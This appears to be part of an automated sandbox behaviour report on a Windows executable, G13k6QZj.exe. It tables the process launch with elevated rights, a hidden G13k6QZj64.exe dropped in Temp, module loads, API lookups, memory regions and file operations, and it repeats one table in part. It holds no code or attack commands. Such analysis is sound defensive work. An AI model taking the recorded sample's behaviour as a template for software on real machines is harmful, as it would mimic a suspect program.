|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | os_pid = 0x944, show_window = SW_HIDE |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75260000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x76a10000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x75160000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77000000 |
|
1 | |
| Load | USER32.dll | base_address = 0x77150000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x748e0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x752860c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75286110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x752787e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75285f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75284a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75285fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7527a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7527c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75286300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75279a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x752861b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7527fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77cf4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75279a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x752779b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7527fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x752792b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7527a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75286180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75283a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75278cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75285f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75272af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x752778f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75272db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75272da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75277a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7527a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75279660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7527a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7527a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x752787c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75278840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75277940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75279560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x752869c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75286390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x752a1c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x752868e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75286920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75286540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77ce5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77ce5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x752a26a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77cdda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77cff190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77cfa200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x752874f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75279fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75272d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x752775a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x752725e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75286870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x752868c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75286900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75279700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75271b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77d02570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75277920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77cf9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x752862a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75286590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75286860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75279680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x752864a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7527a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x752a28e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7527a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75286020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x752777b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7527fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75279a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75271ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75271da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75279930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7527a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75278770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7527fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75279fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75277910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75279a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75272dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75271d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75272b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7527a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7527a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77cdbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x752864f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x76a2ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x76a2fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x76a295e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x76a30680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x76a2ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x76a2f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x76a2ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x76a2ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x76a2f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x76a306c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x76a2efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x76a2f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x7516c6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x770aee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x770855a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x770857e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x77089590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x77080820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x770afbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x771638f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x7717b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x7717b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x77167740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x771774e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x7717efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x77184ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x77174580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x77171540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x748e1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x748e1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x748e1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7527a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7527f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75277580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75279910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75286030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75285f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75285ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7527a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7527a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77cd40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77ccd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77ccecf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75285720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77cce140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77cceb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77d09990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77d05540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77cf9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7527a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x752a0a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74fa0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7527f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7527fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x752a1030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7527a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x752a14b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7527a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x752a16f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75279970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f23c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75278710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x752796e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-09 19:47:54 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #133: g13k6qzj.exe
175
0
| Information | Value |
|---|---|
| ID | #133 |
| File Name | c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe |
| Command Line | G13k6QZj.exe -accepteula "Seyes.jtp" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:43, Reason: Child Process |
| Unmonitor | End Time: 00:02:48, Reason: Self Terminated |
| Monitor Duration | 00:00:05 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x2c0 |
| Parent PID | 0x67c (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
81C
0x
B40
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x002d0000 | 0x002f9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002d0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x0030ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x0036ffff | Private Memory | rw |
|
|
|
- |
| g13k6qzj.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x006dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005e0000 | 0x005e0000 | 0x006dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006e0000 | 0x006e0000 | 0x007dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000007e0000 | 0x007e0000 | 0x00967fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000970000 | 0x00970000 | 0x00af0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000b00000 | 0x00b00000 | 0x01efffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x73d90000 | 0x73e21fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x75160000 | 0x7521dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x753b0000 | 0x753f3fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75430000 | 0x767eefff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x76810000 | 0x7681efff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77340000 | 0x773ccfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x773f0000 | 0x778ccfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77c30000 | 0x77c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75260000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x76a10000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x75160000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77000000 |
|
1 | |
| Load | USER32.dll | base_address = 0x77150000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x748e0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x752860c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75286110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x752787e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75285f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75284a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75285fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7527a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7527c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75286300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75279a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x752861b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7527fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77cf4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75279a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x752779b0 |
|
1 | |
